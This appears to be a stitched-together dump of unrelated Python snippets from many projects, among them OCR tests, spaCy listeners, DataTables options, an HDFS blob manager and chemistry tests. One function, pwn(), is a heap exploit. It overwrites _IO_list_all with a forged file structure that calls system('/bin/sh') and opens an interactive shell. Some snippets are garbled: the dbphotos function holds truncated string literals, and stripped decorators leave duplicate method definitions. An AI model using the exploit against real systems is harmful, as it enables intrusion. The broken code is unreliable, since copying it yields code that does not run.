utils.copy_traineddata_files(target_dir=tessdata_path)
traineddatas = list(tessdata_path.glob('*.traineddata'))
txts = list(tessdata_path.glob('*.txt'))
assert traineddatas
assert (len(txts) == 2)
finally:
for f in (resource_path / 'tessdata').glob('placeholder_?.traineddata'):
f.unlink() |
def extractShirokumamachinetranslationWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def forward(model: TransformerListener, docs, is_train):
if is_train:
if (model._batch_id is None):
outputs = []
for doc in docs:
if (doc._.trf_data is None):
raise ValueError(Errors.E203.format(name='transformer'))
else:
outputs.append(doc._.trf_data)
return (outputs, _empty_backprop)
else:
model.verify_inputs(docs)
return (model._outputs, model.backprop_and_clear)
else:
width = model.get_dim('nO')
outputs = []
for doc in docs:
if (doc._.trf_data is None):
outputs.append(TransformerData.zeros(len(doc), width, xp=model.ops.xp))
else:
outputs.append(doc._.trf_data)
return (outputs, _empty_backprop) |
def get_workflow_stub_fn(wm: WorkflowMethod):
def workflow_stub_fn(self, *args):
assert (self._workflow_client is not None)
return exec_workflow_sync(self._workflow_client, wm, args, workflow_options=self._workflow_options, stub_instance=self)
workflow_stub_fn._workflow_method = wm
return workflow_stub_fn |
def setup_sudoers(user):
from bench.config.lets_encrypt import get_certbot_path
if (not os.path.exists('/etc/sudoers.d')):
os.makedirs('/etc/sudoers.d')
set_permissions = (not os.path.exists('/etc/sudoers'))
with open('/etc/sudoers', 'a') as f:
f.write('\n#includedir /etc/sudoers.d\n')
if set_permissions:
os.chmod('/etc/sudoers', 288)
template = bench.config.env().get_template('frappe_sudoers')
frappe_sudoers = template.render(**{'user': user, 'service': which('service'), 'systemctl': which('systemctl'), 'nginx': which('nginx'), 'certbot': get_certbot_path()})
with open(sudoers_file, 'w') as f:
f.write(frappe_sudoers)
os.chmod(sudoers_file, 288)
log(f'Sudoers was set up for user {user}', level=1) |
class Dialogues(BaseDialogues):
END_STATES = frozenset({Dialogue.EndState.SUCCESSFUL, Dialogue.EndState.FAILED})
def __init__(self, self_address: Address, message_class=DefaultMessage, dialogue_class=Dialogue, keep_terminal_state_dialogues=None) -> None:
def role_from_first_message(message: Message, receiver_address: Address) -> BaseDialogue.Role:
return Dialogue.Role.ROLE1
BaseDialogues.__init__(self, self_address=self_address, end_states=cast(FrozenSet[BaseDialogue.EndState], self.END_STATES), message_class=message_class, dialogue_class=dialogue_class, role_from_first_message=role_from_first_message, keep_terminal_state_dialogues=keep_terminal_state_dialogues) |
def pwn():
io_list_all = (libc_base + libc.symbols['_IO_list_all'])
system_addr = (libc_base + libc.symbols['system'])
vtable_addr = (heap_addr + 1480)
log.info(('_IO_list_all address: 0x%x' % io_list_all))
log.info(('system address: 0x%x' % system_addr))
log.info(('vtable address: 0x%x' % vtable_addr))
stream = ('/bin/sh\x00' + p64(96))
stream += (p64(0) + p64((io_list_all - 16)))
stream = stream.ljust(160, '\x00')
stream += p64((heap_addr + 1464))
stream = stream.ljust(192, '\x00')
stream += p64(1)
payload = ('A' * 1056)
payload += stream
payload += (p64(0) * 2)
payload += p64(vtable_addr)
payload += p64(1)
payload += p64(2)
payload += p64(system_addr)
upgrade(1536, payload)
io.sendlineafter('Your choice : ', '1')
io.interactive() |
def start():
global gameStarted, hunger, fun, health, alive, day, money
if (gameStarted == False):
gameStarted = True
hunger = 100
fun = 100
health = 100
day = 0
money = 0
sick = False
alive = True
startLabel.config(text='')
update() |
def make_transfer_trace(block_number: int, transaction_hash: str, trace_address: List[int], from_address: str, to_address: str, token_address: str, amount: int):
return DecodedCallTrace(transaction_hash=transaction_hash, transaction_position=0, block_number=block_number, type=TraceType.call, trace_address=trace_address, classification=Classification.transfer, from_address=from_address, to_address=token_address, abi_name='ERC20', function_name='transfer', function_signature='transfer(address,uint256)', inputs={'recipient': to_address, 'amount': amount}, block_hash=str(block_number), action={}, subtraces=0.0) |
def _AddVersionKeys(plist, version=None):
if version:
match = re.match('\\d+\\.\\d+\\.(\\d+\\.\\d+)$', version)
if (not match):
print(('Invalid version string specified: "%s"' % version), file=sys.stderr)
return False
full_version = match.group(0)
bundle_version = match.group(1)
else:
VERSION_TOOL = os.path.join(TOP, 'build/util/version.py')
VERSION_FILE = os.path.join(TOP, 'chrome/VERSION')
(stdout, retval1) = _GetOutput([VERSION_TOOL, '-f', VERSION_FILE, '-t', ''])
full_version = stdout.rstrip()
(stdout, retval2) = _GetOutput([VERSION_TOOL, '-f', VERSION_FILE, '-t', ''])
bundle_version = stdout.rstrip()
if (retval1 or retval2):
return False
plist['CFBundleShortVersionString'] = full_version
plist['CFBundleVersion'] = bundle_version
return True |
('/dbphotos/<subject>/<pictype>/<page>')
def dbphotos(subject, pictype='S', page=0):
pictypes = {'R': '', 'S': '', 'W': ''}
del pictypes[pictype]
menus = []
for key in pictypes:
menus.append({'label': comm.colorize_label(pictypes[key], None, color='32FF94'), 'path': plugin.url_for('dbphotos', subject=subject, pictype=key, page=0), 'thumbnail': xbmc.translatePath(os.path.join(IMAGES_PATH, 'picture.png'))})
url = (' % (subject, pictype, (int(page) * 30)))
rsp = _ referer='
rtxt = '\\x3Cli.*?data\\x2Did.*?img\\s+src\\x3D\\x22(?P<imgurl>[^\\s]*?)\\x22.*?\\x22name\\x22\\x3E(?P<imgname>.*?)\\x3C'
for photo in re.finditer(rtxt, rsp, re.DOTALL):
resource_url = ''
limg = photo.group('imgurl')
limg = limg.replace('/m/', '/l/')
imgname = html.unescape(photo.group('imgname').strip())
menus.append({'label': imgname, 'path': plugin.url_for('showpic', imageurl=limg), 'properties': {'mimetype': 'image/jpeg'}, 'thumbnail': photo.group('imgurl')})
m = re.search('"count".*?(?P<count>[0-9]+)', rsp, re.DOTALL)
if m:
count = int(m.group('count'))
totalpage = int(((count - 1) / 30))
if (int(page) < totalpage):
menus.append({'label': '', 'thumbnail': xbmc.translatePath(os.path.join(IMAGES_PATH, 'nextpage.png')), 'path': plugin.url_for('dbphotos', subject=subject, pictype=pictype, page=(int(page) + 1))})
comm.setViewCode = 'thumbnail'
return menus |
class TestOFReader(unittest.TestCase):
def test_simple(self):
reader = OFReader('abcdefg')
self.assertEquals(reader.read('2s')[0], 'ab')
self.assertEquals(reader.read('2s')[0], 'cd')
self.assertEquals(reader.read('3s')[0], 'efg')
with self.assertRaisesRegexp(loxi.ProtocolError, 'Buffer too short'):
reader.read('s')
def test_skip(self):
reader = OFReader('abcdefg')
reader.skip(4)
self.assertEquals(reader.read('s')[0], 'e')
with self.assertRaisesRegexp(loxi.ProtocolError, 'Buffer too short'):
reader.skip(3)
def test_empty(self):
reader = OFReader('abcdefg')
self.assertEquals(reader.is_empty(), False)
reader.skip(6)
self.assertEquals(reader.is_empty(), False)
reader.skip(1)
self.assertEquals(reader.is_empty(), True)
with self.assertRaisesRegexp(loxi.ProtocolError, 'Buffer too short'):
reader.skip(1)
def test_exception_effect(self):
reader = OFReader('abcdefg')
with self.assertRaisesRegexp(loxi.ProtocolError, 'Buffer too short'):
reader.skip(8)
self.assertEquals(reader.is_empty(), False)
reader.skip(7)
self.assertEquals(reader.is_empty(), True)
def test_peek(self):
reader = OFReader('abcdefg')
self.assertEquals(reader.peek('2s')[0], 'ab')
self.assertEquals(reader.peek('2s')[0], 'ab')
self.assertEquals(reader.read('2s')[0], 'ab')
self.assertEquals(reader.peek('2s')[0], 'cd')
reader.skip(2)
self.assertEquals(reader.read('3s')[0], 'efg')
with self.assertRaisesRegexp(loxi.ProtocolError, 'Buffer too short'):
reader.peek('s')
def test_read_all(self):
reader = OFReader('abcdefg')
reader.skip(2)
self.assertEquals(reader.read_all(), 'cdefg')
self.assertEquals(reader.read_all(), '')
def test_slice(self):
reader = OFReader('abcdefg')
reader.skip(2)
self.assertEquals(reader.slice(3).read_all(), 'cde')
self.assertEquals(reader.slice(2).read_all(), 'fg')
self.assertEquals(reader.is_empty(), True)
def test_skip_align(self):
reader = OFReader((((('abcd' + 'efgh') + 'ijkl') + 'mnop') + 'qrst'))
reader.skip_align()
self.assertEquals(reader.peek('2s')[0], 'ab')
self.assertEquals(reader.read('2s')[0], 'ab')
reader.skip_align()
self.assertEquals(reader.peek('2s')[0], 'ij')
self.assertEquals(reader.read('2s')[0], 'ij')
child = reader.slice(10)
self.assertEquals(child.read('2s')[0], 'kl')
child.skip_align()
self.assertEquals(child.peek('2s')[0], 'st') |
class LedgerDialogues(LedgerApiDialogues):
def __init__(self, self_address: Address) -> None:
def role_from_first_message(message: Message, receiver_address: Address) -> BaseDialogue.Role:
return LedgerApiDialogue.Role.LEDGER
LedgerApiDialogues.__init__(self, self_address=self_address, role_from_first_message=role_from_first_message, dialogue_class=LedgerDialogue) |
class SliderInterface():
def __init__(self, qslider):
self.qslider = qslider
def value(self) -> int:
return self.qslider.value()
def value(self, value: int):
self.qslider.setValue(value)
def max(self) -> int:
return self.qslider.maximum()
def max(self, value: int):
self.qslider.setMaximum(value)
def min(self):
return self.qslider.minimum()
def min(self, value: int):
self.qslider.setMinimum(value) |
class TestXmlTreeWriter():
def test_should_create_separate_elements_depending_on_path(self):
xml_writer = XmlTreeWriter(E('root'), element_maker=E)
xml_writer.require_path(['parent', 'child1'])
xml_writer.append_text(TEXT_1)
xml_writer.require_path(['parent', 'child2'])
xml_writer.append_text(TEXT_2)
root = xml_writer.root
assert (get_text_content_list(root.xpath('parent/child1')) == [TEXT_1])
assert (get_text_content_list(root.xpath('parent/child2')) == [TEXT_2])
def test_should_create_use_same_element_for_same_path(self):
xml_writer = XmlTreeWriter(E('root'), element_maker=E)
xml_writer.require_path(['parent', 'child1'])
xml_writer.append_text(TEXT_1)
xml_writer.require_path(['parent', 'child1'])
xml_writer.append_text(TEXT_2)
root = xml_writer.root
assert (get_text_content_list(root.xpath('parent/child1')) == [(TEXT_1 + TEXT_2)]) |
def get_help_topic(help_entry):
help_topic = getattr(help_entry, 'key', None)
if (not help_topic):
help_topic = getattr(help_entry, 'db_key', 'unknown_topic')
if (not hasattr(help_entry, 'web_help_key')):
setattr(help_entry, 'web_help_key', slugify(help_topic))
return help_topic.lower() |
class HDFSBlobManager(BlobManager):
def __init__(self, config: Dict[(str, Any)]):
super().__init__(config)
if (not self.root_dir):
raise AIFlowConfigException('`root_directory` option of blob manager config is not configured.')
hdfs_url = config.get('hdfs_url', None)
if (not hdfs_url):
raise AIFlowConfigException('`hdfs_url` is not configured.')
hdfs_user = config.get('hdfs_user', 'default')
hdfs_client = InsecureClient(url=hdfs_url, user=hdfs_user)
self._hdfs_client = hdfs_client
def upload(self, local_file_path: str) -> str:
file_name = os.path.basename(local_file_path)
remote_file_path = os.path.join(self.root_dir, file_name)
self._hdfs_client.upload(hdfs_path=remote_file_path, local_path=local_file_path)
return remote_file_path
def download(self, remote_file_path: str, local_dir: str) -> str:
self._check_remote_path_legality(remote_file_path)
file_name = os.path.basename(remote_file_path)
local_file_path = os.path.join(local_dir, file_name)
if (not os.path.exists(local_file_path)):
lock_file_path = '{}.lock'.format(local_file_path)
lock_file = open(lock_file_path, 'w')
fcntl.flock(lock_file.fileno(), fcntl.LOCK_EX)
try:
if (not os.path.exists(local_file_path)):
self.log.info('Downloading file from HDFS: {}'.format(remote_file_path))
self._download_file_from_hdfs(hdfs_path=remote_file_path, local_path=local_file_path)
except Exception as e:
self.log.error('Failed to download file: {}'.format(remote_file_path), exc_info=e)
finally:
fcntl.flock(lock_file.fileno(), fcntl.LOCK_UN)
self.log.debug('Unlocked file {}'.format(lock_file_path))
lock_file.close()
if os.path.exists(lock_file_path):
try:
os.remove(lock_file_path)
except OSError as e:
self.log.warning('Failed to remove lock file: {}'.format(lock_file_path), exc_info=e)
else:
self.log.debug('HDFS file: {} already exist at {}'.format(remote_file_path, local_file_path))
return local_file_path
def _download_file_from_hdfs(self, hdfs_path, local_path, retry_sleep_sec=5):
for i in range(3):
try:
self._hdfs_client.download(hdfs_path=hdfs_path, local_path=local_path)
return
except Exception as e:
self.log.error('Downloading file {} failed, retrying {}/3 in {} second'.format(hdfs_path, (i + 1), retry_sleep_sec), exc_info=e)
time.sleep(retry_sleep_sec)
raise RuntimeError('Failed to download HDFS file: {}'.format(hdfs_path))
def _check_remote_path_legality(self, file_path: str):
if (not file_path.startswith(self.root_dir)):
raise Exception('Cannot download {} from blob server'.format(file_path)) |
class Serve(BaseServe):
name = SERVE_APP_NAME
def __init__(self, system_app: SystemApp, api_prefix: Optional[str]=f'/api/v1/serve/{APP_NAME}', api_tags: Optional[List[str]]=None, db_url_or_db: Union[(str, URL, DatabaseManager)]=None, try_create_tables: Optional[bool]=False):
if (api_tags is None):
api_tags = [SERVE_APP_NAME_HUMP]
super().__init__(system_app, api_prefix, api_tags, db_url_or_db, try_create_tables)
self._db_manager: Optional[DatabaseManager] = None
self._conv_storage = None
self._message_storage = None
def conv_storage(self) -> StorageInterface:
return self._conv_storage
def message_storage(self) -> StorageInterface:
return self._message_storage
def init_app(self, system_app: SystemApp):
if self._app_has_initiated:
return
self._system_app = system_app
self._app_has_initiated = True
def on_init(self):
from dbgpt.storage.chat_history.chat_history_db import ChatHistoryEntity, ChatHistoryMessageEntity
def before_start(self):
from dbgpt.storage.chat_history.chat_history_db import ChatHistoryEntity, ChatHistoryMessageEntity
from dbgpt.storage.chat_history.storage_adapter import DBMessageStorageItemAdapter, DBStorageConversationItemAdapter
from dbgpt.storage.metadata.db_storage import SQLAlchemyStorage
from dbgpt.util.serialization.json_serialization import JsonSerializer
self._db_manager = self.create_or_get_db_manager()
self._conv_storage = SQLAlchemyStorage(self._db_manager, ChatHistoryEntity, DBStorageConversationItemAdapter(), JsonSerializer())
self._message_storage = SQLAlchemyStorage(self._db_manager, ChatHistoryMessageEntity, DBMessageStorageItemAdapter(), JsonSerializer()) |
class EnhancedIconView(Gtk.IconView):
__gtype_name__ = 'EnhancedIconView'
__gsignals__ = {'item-clicked': (GObject.SIGNAL_RUN_LAST, None, (object, object))}
object_column = GObject.property(type=int, default=(- 1))
def __init__(self, *args, **kwargs):
super(EnhancedIconView, self).__init__(*args, **kwargs)
self._reallocate_count = 0
self.view_name = None
self.source = None
self.ext_menu_pos = 0
def do_size_allocate(self, allocation):
if (self.get_allocated_width() != allocation.width):
self._reallocate_count += 1
Gdk.threads_add_timeout(GLib.PRIORITY_DEFAULT_IDLE, 500, self._reallocate_columns, None)
Gtk.IconView.do_size_allocate(self, allocation)
def _reallocate_columns(self, *args):
self._reallocate_count -= 1
if (not self._reallocate_count):
self.set_columns(0)
self.set_columns((- 1))
def do_button_press_event(self, event):
x = int(event.x)
y = int(event.y)
current_path = self.get_path_at_pos(x, y)
if ((event.type is Gdk.EventType.BUTTON_PRESS) and current_path):
if event.triggers_context_menu():
if ((len(self.get_selected_objects()) > 0) and (not self.path_is_selected(current_path))):
self.unselect_all()
self.select_path(current_path)
self.set_cursor(current_path, None, False)
if self.popup:
self.popup.popup(self.source, 'popup_menu', event.button, event.time)
else:
self.emit('item-clicked', event, current_path)
Gtk.IconView.do_button_press_event(self, event)
def get_selected_objects(self):
selected_items = self.get_selected_items()
if (not self.object_column):
return selected_items
model = self.get_model()
selected_objects = list(reversed([model[selected][self.object_column] for selected in selected_items]))
return selected_objects
def select_and_scroll_to_path(self, path):
self.unselect_all()
self.select_path(path)
self.set_cursor(path, None, False)
self.scroll_to_path(path, True, 0.5, 0.5) |
class TableConfig(OptionsWithTemplates):
('datatables-autoFill', 'datatables-autoFill')
def autoFill(self):
from epyk.core.html.tables.exts import DtAutoFill
return self._config_sub_data('autoFill', DtAutoFill.AutoFill)
def autoWidth(self):
return self._config_get()
def autoWidth(self, val):
self._config(val)
('datatables-buttons', 'datatables-buttons')
def buttons(self):
from epyk.core.html.tables.exts import DtButtons
self.dom = 'B<"clear">lfrtip'
return self._config_sub_data('buttons', DtButtons.Buttons)
('datatables-buttons', 'datatables-buttons')
def colReorder(self):
from epyk.core.html.tables.exts import DtColReorder
return self._config_sub_data('colReorder', DtColReorder.ColReorder)
def deferRender(self):
return self._config_get()
def deferRender(self, val):
self._config(val)
('datatables-fixed-header', 'datatables-fixed-header')
def fixedHeader(self):
from epyk.core.html.tables.exts import DtFixedHeader
return self._config_sub_data('fixedHeader', DtFixedHeader.FixedHeater)
('datatables-fixed-columns', 'datatables-fixed-columns')
def fixedColumns(self):
from epyk.core.html.tables.exts import DtFixedColumns
return self._config_sub_data('fixedColumns', DtFixedColumns.FixedColumns)
('datatables-keytable', 'datatables-keytable')
def keys(self):
from epyk.core.html.tables.exts import DtKeyTable
return self._config_sub_data('keys', DtKeyTable.KeyTable)
def lengthChange(self):
return self._config_get()
def lengthChange(self, val):
self._config(val)
def columnDefs(self):
return self._config_sub_data_enum('columnDefs', ColumnDef)
def columns(self):
return self._config_sub_data_enum('columns', Column)
def language(self):
return self._config_sub_data('language', Language)
def ajax(self):
return self._config_get()
def ajax(self, val):
self._config(val)
def processing(self):
return self._config_get()
def processing(self, val):
self._config(val)
def search(self):
return self._config_sub_data_enum('search', Search)
def serverSide(self):
return self._config_get()
def serverSide(self, val):
self._config(val)
def deferLoading(self):
return self._config_get()
def deferLoading(self, val):
self._config(val)
def destroy(self):
return self._config_get()
def destroy(self, val):
self._config(val)
def displayStart(self):
return self._config_get()
def displayStart(self, val):
self._config(val)
def dom(self):
return self._config_get()
def dom(self, val):
self._config(val)
def data(self):
return self._config_get()
def data(self, val):
self._config(val)
def paging(self):
return self._config_get()
def paging(self, val):
self._config(val)
def info(self):
return self._config_get()
def info(self, val):
self._config(val)
def orderCellsTop(self):
return self._config_get()
def orderCellsTop(self, val):
self._config(val)
def orderClasses(self):
return self._config_get()
def orderClasses(self, val):
self._config(val)
def orderFixed(self):
return self._config_get()
def orderFixed(self, val):
self._config(val)
def orderMulti(self):
return self._config_get()
def orderMulti(self, val):
self._config(val)
def ordering(self):
return self._config_get()
def ordering(self, val):
self._config(val)
def order(self, column, direction):
if ('order' not in self.js_tree):
self._config([])
self.js_tree['order'].append([column, direction])
return self
def aoColumns(self):
return self._config_sub_data_enum('aoColumns', AOColumns)
('datatables-responsive', 'datatables-responsive')
def responsive(self):
from epyk.core.html.tables.exts import DtResponsive
return self._config_sub_data('responsive', DtResponsive.Responsive)
def stateSave(self):
return self._config_get()
def stateSave(self, val):
self._config(val)
def scrollY(self):
return self._config_get()
def scrollY(self, val):
self._config(val)
def scrollX(self):
return self._config_get()
def scrollX(self, val):
self._config(val)
def scrollCollapse(self):
return self._config_get()
def scrollCollapse(self, val):
self._config(val)
def displayLength(self):
return self._config_get()
def displayLength(self, val):
self._config(val)
def lengthMenu(self):
return self._config_get()
def lengthMenu(self, val):
self._config(val)
def select(self):
return self._config_get()
def select(self, val):
self._config(val)
def pageLength(self):
return self._config_get()
def pageLength(self, val):
self._config(val)
def pagingType(self):
return self._config_get()
def pagingType(self, val):
self._config(val)
def renderer(self):
return self._config_get()
def renderer(self, val):
self._config(val)
def retrieve(self):
return self._config_get()
def retrieve(self, val):
self._config(val)
def rowId(self):
return self._config_get()
def rowId(self, val):
self._config(val)
('datatables-row-group', 'datatables-row-group')
def rowGroup(self):
from epyk.core.html.tables.exts import DtFixedColumns
return self._config_sub_data('rowGroup', DtFixedColumns.FixedColumns)
def rowsGroup(self):
return self._config_get()
def rowsGroup(self, val):
self.component.jsImports.add('datatables-rows-group')
self._config(val)
('datatables-select', 'datatables-select')
def select(self):
from epyk.core.html.tables.exts import DtSelect
return self._config_sub_data('select', DtSelect.Select)
('datatables-scroller', 'datatables-scroller')
def scroller(self):
from epyk.core.html.tables.exts import DtScroller
return self._config_sub_data('scroller', DtScroller.Scroller)
('datatables-searchPanes', 'datatables-searchPanes')
def searchPanes(self):
from epyk.core.html.tables.exts import DtSearchPanes
self.dom = 'Prftip'
return self._config_sub_data('searchPanes', DtSearchPanes.SearchPanes)
def searchCols(self):
return self._config_get()
def searchCols(self, val):
self._config(val)
def searchDelay(self):
return self._config_get()
def searchDelay(self, val):
self._config(val)
def stateDuration(self):
return self._config_get()
def stateDuration(self, val):
self._config(val)
def stripeClasses(self):
return self._config_get()
def stripeClasses(self, val):
self._config(val)
def tabIndex(self):
return self._config_get()
def tabIndex(self, val):
self._config(val) |
def _write_lookup_aciic_b(gen, t, srcs):
i1 = gen.emit_binop('*', [ConstIntArg(2), srcs[2]], Int)
i2 = gen.emit_binop('+', [ConstIntArg(1), i1], Int)
d1 = gen.emit_func_n(4, 'write_float_array_2D', [srcs[0], srcs[1], i1, srcs[3].re], Float)
d2 = gen.emit_func_n(4, 'write_float_array_2D', [srcs[0], srcs[1], i2, srcs[3].im], Float)
return d1 |
class EmailMessagesPrefs(QuickbooksBaseObject):
class_dict = {'InvoiceMessage': EmailMessageType, 'EstimateMessage': EmailMessageType, 'SalesReceiptMessage': EmailMessageType, 'StatementMessage': EmailMessageType}
def __init__(self):
super().__init__()
self.InvoiceMessage = None
self.EstimateMessage = None
self.SalesReceiptMessage = None
self.StatementMessage = None |
def register_dataset_split(dataset_name, split_dict):
_DATASET_TYPE_LOAD_FUNC_MAP = {'COCODataset': _register_extended_coco, 'COCOText': _register_coco_text, 'COCOTextDataset': _register_coco_text, 'LVISDataset': _register_extended_lvis}
factory = split_dict.get('DS_TYPE', 'COCODataset')
_DATASET_TYPE_LOAD_FUNC_MAP[factory](dataset_name=dataset_name, split_dict=split_dict) |
def str2type(str_type):
str_type = str_type.strip()
if (' or ' in str_type):
subtypes = str_type.split(' or ')
return Union[tuple((str2type(subtype) for subtype in subtypes))]
try:
return eval(str_type)
except (TypeError, SyntaxError, NameError):
pass
if ('[' not in str_type):
try:
if (not str_type.startswith('np.')):
dtype = ('np.' + str_type)
else:
dtype = str_type
return eval(dtype, {'np': np})
except (TypeError, SyntaxError, AttributeError):
pass
if (str_type.startswith('(') and str_type.endswith(')')):
re_comma = re.compile(',(?![^\\[]*\\])(?![^\\(]*\\))')
return Tuple[tuple((str2type(word) for word in re_comma.split(str_type[1:(- 1)]) if word))]
words = [word for word in str_type.split(' ') if word]
if (words[(- 1)] == 'list'):
return List[' '.join(words[:(- 1)])]
if (words[(- 1)] == 'dict'):
if (len(words) != 3):
raise NotImplementedError(f'words: {words}')
key = words[0][:(- 1)]
value = words[1]
return Dict[(key, value)]
if (words[(- 1)] == 'set'):
if (len(words) != 2):
raise NotImplementedError(f'words: {words}')
key = words[0]
return Set[key]
if ('[' not in str_type):
raise ValueError(f"Can't determine the Transonic type from '{str_type}'")
(dtype, str_shape) = str_type.split('[', 1)
dtype = dtype.strip()
if ((not dtype.startswith('np.')) and (dtype not in ('int', 'float'))):
dtype = ('np.' + dtype)
str_shape = ('[' + str_shape)
dtype = eval(dtype, {'np': np})
return Array[(dtype, str_shape)] |
class OptionSeriesScatter3dStatesHoverHalo(Options):
def attributes(self):
return self._config_get(None)
def attributes(self, value: Any):
self._config(value, js_type=False)
def opacity(self):
return self._config_get(0.25)
def opacity(self, num: float):
self._config(num, js_type=False)
def size(self):
return self._config_get(10)
def size(self, num: float):
self._config(num, js_type=False) |
class OptionSeriesHeatmapDataEvents(Options):
def click(self):
return self._config_get(None)
def click(self, value: Any):
self._config(value, js_type=False)
def drag(self):
return self._config_get(None)
def drag(self, value: Any):
self._config(value, js_type=False)
def dragStart(self):
return self._config_get(None)
def dragStart(self, value: Any):
self._config(value, js_type=False)
def drop(self):
return self._config_get(None)
def drop(self, value: Any):
self._config(value, js_type=False)
def mouseOut(self):
return self._config_get(None)
def mouseOut(self, value: Any):
self._config(value, js_type=False)
def mouseOver(self):
return self._config_get(None)
def mouseOver(self, value: Any):
self._config(value, js_type=False)
def remove(self):
return self._config_get(None)
def remove(self, value: Any):
self._config(value, js_type=False)
def select(self):
return self._config_get(None)
def select(self, value: Any):
self._config(value, js_type=False)
def unselect(self):
return self._config_get(None)
def unselect(self, value: Any):
self._config(value, js_type=False)
def update(self):
return self._config_get(None)
def update(self, value: Any):
self._config(value, js_type=False) |
def test_result_lengths_within_slots():
s = 'some random text that will be split by different slot lengths'
for i in range(10):
slots = [i, (i * 3), (i * 5), (i * 10)]
result = ad_from_string(s, slots=slots)
for (string, slot) in zip(result, slots):
assert (len(string) <= slot) |
('orca')
def test_orca_stable():
init_logging()
geom = geom_loader('lib:ozone.xyz')
orca_kwargs = {'keywords': 'UHF def2-SVP', 'pal': 1, 'mult': 1, 'charge': 0}
calc = ORCA(**orca_kwargs)
geom.set_calculator(calc)
unstable_energy = calc.get_energy(geom.atoms, geom.coords)['energy']
assert (unstable_energy == pytest.approx((- 224.)))
calc.do_stable = True
stable_energy = calc.get_energy(geom.atoms, geom.coords)['energy']
assert (stable_energy == pytest.approx((- 224.))) |
def test_align_convert_align_mafft_fasta_to_phylip_relaxed(o_dir, e_dir, request):
program = 'bin/align/phyluce_align_convert_one_align_to_another'
output = os.path.join(o_dir, 'mafft-fasta-to-phylip-relaxed')
cmd = [os.path.join(request.config.rootdir, program), '--alignments', os.path.join(e_dir, 'mafft'), '--output', output, '--input-format', 'fasta', '--output-format', 'phylip-relaxed', '--cores', '1']
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = proc.communicate()
assert (proc.returncode == 0), print('{}'.format(stderr.decode('utf-8')))
output_files = glob.glob(os.path.join(output, '*'))
assert output_files, 'There are no output files'
for output_file in output_files:
name = os.path.basename(output_file)
expected_file = os.path.join(e_dir, 'mafft-fasta-to-phylip-relaxed', name)
observed = open(output_file).read()
expected = open(expected_file).read()
assert (observed == expected) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.